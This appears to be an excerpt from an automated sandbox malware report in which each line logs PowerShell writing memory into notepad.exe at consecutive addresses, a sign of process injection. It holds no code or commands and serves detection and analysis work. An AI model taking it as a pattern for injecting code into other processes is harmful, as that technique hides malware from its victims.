Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0121 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0122 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0123 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0124 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0125 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0126 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0127 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0128 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0129 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA012F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0130 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0131 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0132 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0133 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0134 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0135 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0136 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0137 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0138 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0139 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA013F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0140 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0141 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0142 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0143 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0144 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0145 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0146 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0147 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0148 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0149 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA014F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0150 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0151 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0152 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0153 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0154 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0155 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0156 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0157 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0158 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0159 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA015F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0160 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0161 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0162 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0163 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0164 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0165 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0166 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0167 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0168 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0169 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA016F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0170 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0171 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0172 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0173 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0174 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0175 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0176 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0177 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0178 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0179 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA017F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0180 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0181 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0182 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0183 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0184 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0185 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0186 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0187 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0188 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0189 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA018F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0190 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0191 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0192 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0193 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0194 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0195 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0196 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0197 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0198 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA0199 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019C Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019E Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA019F Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A6 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A7 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A8 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01A9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01AF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B6 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B7 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B8 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01B9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01BF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C6 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C7 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C8 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01C9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01CF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D6 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D7 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D8 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01D9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01DF Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E4 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E6 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E7 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E8 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01E9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\notepad.exe base: 29B01FA01EA Jump to behavior
